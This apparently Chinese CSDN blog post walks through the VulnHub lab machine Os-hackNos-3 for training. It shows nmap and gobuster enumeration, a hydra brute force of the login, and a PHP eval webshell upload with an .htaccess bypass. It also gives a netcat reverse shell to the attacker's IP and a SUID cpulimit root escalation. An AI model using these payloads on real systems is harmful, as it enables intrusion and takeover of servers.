Vulnhub--hackNos: Os-hackNos-3

已于 2023-06-13 16:17:02 修改
阅读量133 收藏
点赞数
文章标签: linux 服务器 网络
于 2023-06-13 15:29:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45168704/article/details/131186207
版权

0x01靶机介绍

项目Value
项目地址https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/
镜像链接https://download.vulnhub.com/hacknos/Os-hackNos-3.ova
作者Rahul Gehlaut
发布日期2019年12月14日
系列hackNos
难度中等
目的获取root权限中的flag

0x02靶机搭建

工具:VirtualBox7.0
镜像:Os-hackNos-3.ova

搭建方式:

1.管理–>导入虚拟机–>Os-hackNos-3.ova–> Finish
在这里插入图片描述

2.设置–>网络–>混杂模式改为全部允许(顺带记下mac地址方便寻找虚拟机):
在这里插入图片描述
3.开启我们的攻击机kali(和靶机一样桥接同一个网卡)和靶机

桥接网段:192.168.3.0/24
kali的IP地址:192.168.3.59

0x03渗透流程

一、信息收集

1.主机发现

这里也试试新方法:

netdiscover -i eth0 -r 192.168.3.0/24

-i eth0:指定要使用的网络接口
-r :指定要扫描的IP地址范围
在这里插入图片描述

2.查看端口
nmap -sV -p- 192.168.3.89

在这里插入图片描述
访问80端口瞅一眼,Ctrl+u看了下没什么东西:
http://192.168.3.89:80
在这里插入图片描述

3.目录扫描

网上学的新方法:

gobuster dir -u http://192.168.3.89 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
访问:http://192.168.3.89/websec/
在这里插入图片描述
页面有个邮箱,不知道有没有用,先记一下:
contact@hacknos.com

在扫一下二级目录发现一个登陆界面

gobuster dir -u http://192.168.3.89/websec -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述

http://192.168.3.89/websec/admin

在这里插入图片描述

二、开始攻击

(1) 爆破web密码

用刚刚的邮箱试一下弱口令吧

contact@hacknos.com
123456/contact/admin

失败,尝试爆破
先使用cewl爬取网页的单词并制作成一个字典

cewl http://192.168.3.89/websec/ > cewl.txt

在这里插入图片描述
然后使用hydra进行爆破密钥

hydra -l contact@hacknos.com -P cewl.txt 192.168.3.89 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email"

-l: 指定要破解的用户名
-P: 指定密码列表文件的路径
http-post-form : 指定要攻击的Web应用程序的登录页面和表单数据,USERPASS 是占位符,Wrong email 是错误消息,如果登录失败则返回此消息。
在这里插入图片描述
使用账号密码登陆

用户名:contact@hacknos.com
密码 :Securityx

在这里插入图片描述

(2) getshell

此处存在上传点
在这里插入图片描述
在这里插入图片描述
这里上传一句话木马文件shell.php
文件内容为:

<?php @eval(&_POST['cmd']);?>

在这里插入图片描述
尝试访问http://192.168.3.89/websec/themes/gila-blog/shell.php

回显没有权限访问。这里将themes目录下的./htaccess文件清空
在这里插入图片描述

再次访问显白,蚁剑连接成功getshell

http://192.168.3.89/websec/themes/gila-blog/shell.php

在这里插入图片描述

(3) 提权

可以看到这里是低权限www,我们尝试反弹shell
在这里插入图片描述
kali开启监听:

nc -lvvp 7777  //命令回显
nc -lvvp 6666 //命令执行

蚁剑终端执行:

nc 192.168.3.59 6666|/bin/bash|nc 192.168.3.59 7777

在这里插入图片描述
6666执行整个交互式shell(方便)

python -c 'import pty; pty.spawn("/bin/bash")

6666执行查看具有suid权限的文件,发现可以使用cpulimit提权:

find /usr/bin -type f -perm -u=s 2>/dev/null

在这里插入图片描述
这里cpulimit提权方法很多,使用一个最简单的进行即可

cpulimit -l 100 -f -- /bin/sh -p
id
cd /root
cat root.txt

在这里插入图片描述

参考文章:

https://www.cnblogs.com/bingekong/articles/16816364.html

巴鸽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub—Os-hackNos-3
weixin_39219503的博客
01-07 814
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub--OS-HACKNOS-2.1
流水不争先,争的是滔滔不绝
06-22 510
(1)wpsacn扫描wordpress站点;(2)以root权限进行su切换root用户时,无需输入root密码
vulnhub靶机 Os-hackNos-1
witwitwiter的博客
08-24 2195
vulnhub靶机 Os-hackNos-1 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 在将靶机文件下载下来为Os-hackNos-1.ova 使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e 向下翻动,将ro改为rw single init=/bin/bash 然后按下 ctr
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3170
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
Linux:Linux发展史
weixin_51142926的博客
07-22 4357
大家好!此篇文章并非技术博文,而是简单了解Linux的时代背景和发展史,只有知其所以然才能让我们更好地让走进Liunx的世界!
【Linux】一些基本指令
weixin_73914025的博客
07-25 683
在学习操作系统的时候,我们应该要清楚操作系统是什么。操作系统是一款进行软硬件资源管理的软件。如果没有操作系统,即使是有一台好的电脑配有一套好的鼠标和键盘,我们也无法使用这台电脑。所以我们也就知道了为什么要进行软硬件资源管理,目的就是为我们使用机器提供了良好的服务。我们在《Linux的环境搭配中》提到了云服务器的使用,为了方便学习,我在Linux的学习中,将会使用云服务器来进行学习。在上面提到的那片文章中,我们提到了Xshell,我们在每次打开Xshellssh (用户名)@(公网IP)
Linux下pip的安装、命令总结、换源
2301_79695159的博客
07-24 588
Linux下pip的安装、命令总结、换源
【Linux】 Linux makefile 教程
沐风—云端行者
07-23 755
什么是makefile?或许很多Winodws的程序员都不知道这个东西,因为那些Windows的IDE都为你做了这个工作,但我觉得要作一个好的和professional的程序员,makefile还是要懂。这就好像现在有这么多的HTML的编辑器,但如果你想成为一个专业人士,你还是要了解HTML的标识的含义。特别在Unix下的软件编译,你就不能不自己写makefile了,会不会写makefile,从一个侧面说明了一个人是否具备完成大型工程的能力。因为,makefile关系到了整个工程的编译规则。一个工程中的源文
【Linux C | 网络编程】进程间传递文件描述符socketpair、sendmsg、recvmsg详解
最新发布
qq_42037383的博客
07-25 1008
我们的目的是,实现进程间传递文件描述符,是指 A进程打开文件fileA,获得文件描述符为fdA,现在 A进程要通过某种方法,传递fdA,使得另一个进程B,获得一个新的文件描述符fdB,这个fdB在进程B中的作用,跟fdA在进程A中的作用一样。即在 fdB上的操作,即是对fileA的操作。可能很多人想到的是用管道pipe来实现,但是却没想象的那么容易。
Linux取消U盘自动挂载
dmgy110的博客
07-25 350
【代码】Linux取消U盘自动挂载。
Linux中将文件解压到指定目录
weixin_61663117的博客
07-23 406
请确保目标目录已经存在,否则上述命令可能会报错。如果目录不存在,你可以使用。通常是用来压缩单个文件的,而不是目录。所以你需要指定解压后的文件名。选项会创建所有必要的父目录。是你想要解压到的目标目录。选项后面跟着的是目标目录。通常用于压缩单个文件。
Linux——DNS服务搭建
ln2915275834的博客
07-23 937
要求能够ping通外网,有yum源。
linux设置~/.vimrc步骤
qq_43982499的博客
07-24 560
set backupdir=~/.vim/backup " 设置备份文件存放路径。set tabstop=4 " 设置Tab键宽度为4个空格。set shiftwidth=4 " 设置自动缩进宽度为4个空格。set undodir=~/.vim/undo " 设置撤销历史文件存放路径。set hlsearch " 搜索结果高亮显示。set fileformat=unix " 设置文件格式为Unix风格。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值